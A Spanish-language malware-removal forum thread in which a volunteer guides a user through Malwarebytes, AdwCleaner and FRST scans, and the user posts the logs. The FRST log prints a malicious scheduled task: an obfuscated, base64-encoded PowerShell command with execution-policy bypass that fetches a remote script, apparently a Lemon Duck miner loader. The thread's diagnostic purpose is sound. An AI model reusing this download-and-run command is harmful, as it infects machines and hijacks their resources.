Troyano/Malware molesto

diegojmv · 23 Noviembre, 2019 16:44

¡Hola, comunidad de ForoSpyware!

Hace poco noté que el rendimiento de mi computadora había mermado un poco. Decidí bajar un antivirus (Webroot SecureAnywhere) por medio de una página de dudosa confiabilidad para ver si se trataba de algún virus molesto, y desde entonces ha estado mucho, pero mucho peor. Me parece que fui infectado de algunos malwares referentes al minado de Bitcoin, pues el consumo de CPU se fue por las nubes en procesos que antes no lo usaban para nada.

He pasado varios programas anti-malwares desde entonces y me he logrado deshacer de unos cuantos, por lo que parece. No obstante, aún me hallo con un Powershell.exe que según Malwarebytes intenta conectarse a sitios que no debería (t.zer2.com, lpp.zer2.com) y con un rendimiento en mi PC que se encuentra muy lejano al usual.

¿Qué puedo hacer? Mil gracias desde ya.

Daniela · 23 Noviembre, 2019 16:46

Hola @diegojmv bienvenido al ForoSpyware

Realiza los siguientes pasos, aunque hayas hecho alguno, sin cambiar el orden:

1) Descarga, instala y ejecuta Malwarebytes’ Anti-Malware.

Presiona clic en “Use Malewarebytes Free” (Usar Malewarebyte gratis).
Pulsa en el botón “Open Malewarebytes Free”.

imagen

Presiona el botón “Scan” (Escaneo).

imagen

Una vez finalizado el escaneo aparecerá la siguiente pantalla:

imagen

Pulsa en “View report” (Ver informe).
Luego presionar el botón “Export” (Exportar). Elijes “Text file” (fichero de texto). Elijes un nombre y guardas ese archivo en el escritorio…

2) Descarga AdwCleaner | InfoSpyware en el escritorio.

Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus.
Cierra también todos los programas que tengas abiertos.
Ejecuta Adwcleaner.exe (Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador".)
Pulsar en el botón Escanear, y espera a que se realice el proceso, inmediatamente pulsa sobre el botón Limpiar.
Espera a que se complete y sigue las instrucciones, si te pidiera Reiniciar el sistema Aceptas.
Guardas el reporte que te aparecerá, para copiarlo y pegarlo en tu próxima respuesta.
El informe también se puede encontrar en C:\AdwCleaner\AdwCleaner[C1].txt

3) Descarga CCleaner

Instala Ccleaner
Abres Ccleaner en la pestaña limpiador dejas como esta configurada predeterminadamente, haces clic en analizar esperas que termine >> clic en ejecutar limpiador
Clic en la pestaña Registro >> clic en buscar problemas esperas que termine >> clic en Reparar Seleccionadas y haces una copia de seguridad
Vuelves a darle clic en buscar problemas hasta que no encuentre ninguno.

Pega los reportes de Malwarebytes y AdwCleaner y comentas como va el problema.

¿Cómo pegar reportes en el foro?

Un saludo

diegojmv · 24 Noviembre, 2019 02:57

Sin mayores cambios. El Malwarebytes detectó un PUP (Search Manager) que continúa reinstalándose a pesar de ser detectado y borrado tanto por el MB como por el Adwcleaner. Sigue saliendo el aviso del “Sitio web bloqueado debido a troyano” con el Powershell.

Cuando pasé el Malwarebytes antes de postear en el foro, tuve problemas con el proceso Svchost.exe, hasta ahora creo que está actuando extraño, pero no da más complicaciones que lo del Powershell.

Adjunto aquí los reportes de Malwarebytes y Adwcleaner.

# -------------------------------
# Malwarebytes AdwCleaner 7.4.2.0
# -------------------------------
# Build:    10-21-2019
# Database: 2019-11-20.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    11-23-2019
# Duration: 00:00:21
# OS:       Windows 10 Enterprise 2016 LTSB
# Cleaned:  18
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\ProgramData\IOBIT\Driver Booster
Deleted       C:\ProgramData\IObit\Advanced SystemCare
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\IOBIT\Driver Booster
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\mipony
Deleted       C:\Users\Alfredo y Diego\AppData\Roaming\mipony

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\DRIVER BOOSTER SKIPUAC (ALFREDO Y DIEGO)

***** [ Registry ] *****

Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{79B62BEC-A7C5-4D0E-8641-7F08A0BAC88A} 
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{79B62BEC-A7C5-4D0E-8641-7F08A0BAC88A} 
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DRIVER BOOSTER SKIPUAC (ALFREDO Y DIEGO)
Deleted       HKLM\Software\Classes\mipony
Deleted       HKLM\Software\Classes\mpybrowser
Deleted       HKLM\Software\IObit\Driver Booster

***** [ Chromium (and derivatives) ] *****

Deleted       Search Manager
Deleted       Search Manager
Deleted       Search Manager
Deleted       Touch VPN
Deleted       User-Agent Switcher for Chrome

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner_Debug.log - [26365 octets] - [23/11/2019 22:33:03]
AdwCleaner[S00].txt - [2802 octets] - [23/11/2019 22:34:19]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 23/11/19
Hora del análisis: 21:51
Archivo de registro: 0098a088-0e5d-11ea-9d95-0019666d7174.json

-Información del software-
Versión: 4.0.4.49
Versión de los componentes: 1.0.750
Versión del paquete de actualización: 1.0.15326
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 14393.0)
CPU: x86
Sistema de archivos: NTFS
Usuario: DESKTOP-227CIGF\Alfredo y Diego

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 192178
Amenazas detectadas: 18
Amenazas en cuarentena: 18
Tiempo transcurrido: 33 min, 2 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 0
(No hay elementos maliciosos detectados)

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 3
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 282, 628563, , , , 
PUP.Optional.ASK, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 2, 454825, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\LevelDB, En cuarentena, 282, 626729, , , , 

Archivo: 15
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000005.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000017.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000019.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000020.log, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000021.ldb, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001, En cuarentena, 282, 628563, , , , 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 628563, 1.0.15326, , ame, 
PUP.Optional.ASK, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sustituido, 2, 454825, 1.0.15326, , ame, 
PUP.Optional.SearchManager.BITSRST, C:\USERS\ALFREDO Y DIEGO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Sustituido, 282, 626729, 1.0.15326, , ame, 

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

¡Saludos!

Daniela · 24 Noviembre, 2019 06:51

Hola

Desactiva temporalmente el Antivirus >> Cómo deshabilitar temporalmente su Antivirus

Descarga Farbar Recovery Scan Tool. seleccionando la versión adecuada para la arquitectura(32 o 64bits) de tu equipo. [color=#FF8C00][size=1] ¿Cómo saber si mi Windows es de 32 o 64 bits.?[/size][/color]

Ejecuta FRST.exe.
En el mensaje de la ventana del Disclaimer, pulsamos Yes
En la ventana principal pulsamos en el botón Scan y esperamos a que concluya el proceso.
Se abrirán dos(2) archivos(Logs), Frst.txt y Addition.txt, estos quedaran grabados en el escritorio.

Pon los dos reportes generados.

Debes copiarlos y pegarlos con todo su contenido y usaras varios mensajes si recibes un mensaje de error indicando que es muy largo(mas de 50.000 caracteres aprox.).

Un saludo

diegojmv · 24 Noviembre, 2019 11:55

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-11-2019
Ran by Alfredo y Diego (administrator) on DESKTOP-227CIGF (24-11-2019 07:41:27)
Running from C:\Users\Alfredo y Diego\Downloads
Loaded Profiles: Alfredo y Diego (Available Profiles: defaultuser0 & Alfredo y Diego)
Platform: Microsoft Windows 10 Enterprise 2016 LTSB Version 1607 (X86) Language: Español (España, internacional)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Ivaylo Beltchev -> IvoSoft) [File not signed] C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Kilonova LLC -> Skillbrains) C:\Program Files\Skillbrains\lightshot\5.5.0.4\Lightshot.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [150840 2017-08-13] (Ivaylo Beltchev -> IvoSoft) [File not signed]
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [226728 2019-07-21] (Kilonova LLC -> )
HKLM\...\Run: [] => [X]
HKLM\...\Policies\Explorer: [SettingsPageVisibility] hide:gaming-broadcasting;gaming-gamebar;gaming-gamedvr;gaming-gamemode;gaming-trueplay;gaming-xboxnetworking;maps;pen;recovery;speech;tabletmode;windowsdefender;windowsinsider
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [NetLimiter] => "C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe" /minimized
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [] => [X]
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [4312248 2016-07-16] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\78.0.3904.108\Installer\chrmstp.exe [2019-11-21] (Google LLC -> Google LLC)
Startup: C:\Users\Alfredo y Diego\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2018-12-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Welcome.lnk [2017-11-09]
ShortcutTarget: Welcome.lnk -> C:\Welcome\Welcome.exe () [File not signed]

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {10B4A9FC-1BCE-45C1-AC7C-708121265D8D} - System32\Tasks\Opera scheduled Autoupdate 1533575745 => C:\Users\Alfredo y Diego\AppData\Local\Programs\Opera\launcher.exe [1346584 2019-11-20] (Opera Software AS -> Opera Software)
Task: {134BA36C-7B66-47C4-912C-BA8B4DFE7A56} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [14544792 2018-10-23] (Piriform Software Ltd -> Piriform Ltd)
Task: {1839AB19-E1C3-4278-A318-52E48F8A62DA} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate => {FE285C8C-5360-41C1-A700-045501C740DE} C:\Windows\System32\ErrorDetailsUpdate.dll [63488 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
Task: {2B10C4A1-F875-4DF6-A043-3615AC94371C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-07-19] (Google Inc -> Google Inc.)
Task: {31D84961-0CA5-4EB5-B11E-ECABE1DBF789} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-06-22] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4E5E5049-B160-4913-8357-06D9512C5962} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {5C31AC9F-879B-4147-BA8E-554E06A73DAD} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {62C6AF69-71CD-4E55-A5D0-B0522BCFDCDE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [124632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {7F857067-CFDB-4E63-ACC8-A24DE4CF9F6F} - System32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\InstallShield Installation Information\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}\Setup.exe" -c -runfromtemp  -removeonly
Task: {87402BF2-539F-45AA-B6A8-686921A45CD0} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1542536 2019-11-05] (AVAST Software s.r.o. -> AVAST Software)
Task: {89D42200-1137-4BBF-B9A7-B58C28210C11} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate => {9CDA66BE-3271-4723-8D35-DD834C58AD92} C:\Windows\System32\ErrorDetailsUpdate.dll [63488 2016-07-16] (Microsoft Windows -> Microsoft Corporation)
Task: {8A30ECD0-593E-4E02-A997-F3FCC2F7D2F2} - System32\Tasks\update-sys => C:\Program Files\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {AFB09559-C01C-4F90-AC21-217EB6639FE1} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [314544 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {B889B515-7158-4ADC-88FB-3BC8C642122F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-07-19] (Google Inc -> Google Inc.)
Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb => cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABvAHcAQgBtAHAAZgBZAE8AXABKAHAATgBZAHIAbgBiACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADA (the data entry has 586 more characters).
Task: {E6B4A644-016A-4E3F-B7BC-FB319C3790EF} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {E7A42ECA-97F1-41DB-8311-ACC62E78CCE3} - System32\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001 => C:\Program Files\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {FA6F4456-C5F8-4826-8957-509ED3D3BD3C} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-1270689601-2402022770-626450427-1001 => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\MEGAupdater.exe [760696 2018-01-15] (Mega Limited -> Mega Limited)
Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job => C:\Program Files\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files\Skillbrains\Updater\Updater.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 200.109.78.12 200.44.32.12
Tcpip\..\Interfaces\{c3e01d16-c60a-49b1-906e-d8657b76b1b6}: [NameServer] 1.1.1.1,1.0.0.1
Tcpip\..\Interfaces\{c3e01d16-c60a-49b1-906e-d8657b76b1b6}: [DhcpNameServer] 200.109.78.12 200.44.32.12

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072623682\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072624070\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.facebook.com/groups/windowsminios
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-ve/?ocid=iehp
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-ve/?ocid=iehp
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 5f6kh6xh.default
FF ProfilePath: C:\Users\Alfredo y Diego\AppData\Roaming\Mozilla\Firefox\Profiles\5f6kh6xh.default [2019-11-23]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_31_0_0_108.dll [2018-09-29] (Adobe Systems Incorporated -> )
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)

Chrome: 
=======
CHR HomePage: Default -> hxxp://go.microsoft.com/fwlink/?LinkId=69157
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Notifications: Default -> hxxps://freebitco.in; hxxps://tweetdeck.twitter.com; hxxps://web.whatsapp.com; hxxps://www.facebook.com; hxxps://www.instagram.com
CHR Profile: C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default [2019-11-24]
CHR Extension: (Presentaciones) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-07-19]
CHR Extension: (Documentos) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-07-19]
CHR Extension: (Google Drive) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-16]
CHR Extension: (Touch VPN) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\bihmplhobchoageeokmgbdihknkjbknd [2019-11-23]
CHR Extension: (YouTube) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-07-19]
CHR Extension: (Chrome IG Story) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-01-05]
CHR Extension: (DownAlbum) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgjnhhjpfcdhbhlcmmjppicjmgfkppok [2019-11-16]
CHR Extension: (uBlock Origin) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-11-06]
CHR Extension: (Spotify - Music for every moment) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnkjkdjlofllcpbemipjbcpfnglbgieh [2018-07-19]
CHR Extension: (User-Agent Switcher for Chrome) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\djflhoibgkdhkhhcedjiklpkjnoahfmg [2019-11-23]
CHR Extension: (Hojas de cálculo) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-07-19]
CHR Extension: (Nano Adblocker) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gabbbocakeomblphkmmnoamkioajlkfo [2019-11-10]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-15]
CHR Extension: (Hola Free VPN Proxy Unblocker) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio [2019-11-19]
CHR Extension: (uVPN - Gratis e ilimitada VPN para todos) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpieacagdjdfbifodokiccinpbacemjf [2019-11-12]
CHR Extension: (TweetDeck by Twitter) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbdpomandigafcibbmofojjchbcdagbl [2018-07-19]
CHR Extension: (Web Scrobbler) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\hhinaapppaileiechjoiifaancjggfjm [2019-11-16]
CHR Extension: (Asora) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfomjghdcjmkkmjpmdiimfllafbmpack [2018-08-12]
CHR Extension: (Ayudante de Tramites) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmpbfgcgdhmhloabdbnjcbghceicelpb [2019-11-06]
CHR Extension: (mobile browser emulator) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbofcampnkjmiomohpbaihdcbjhbfepf [2018-07-19]
CHR Extension: (Captura de página completa - FireShot) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg [2019-07-07]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-11-06]
CHR Extension: (TunnelBear VPN) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\omdakjcmkglenbhjadbccaookpfjihpa [2019-08-09]
CHR Extension: (Gmail) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-06-26]
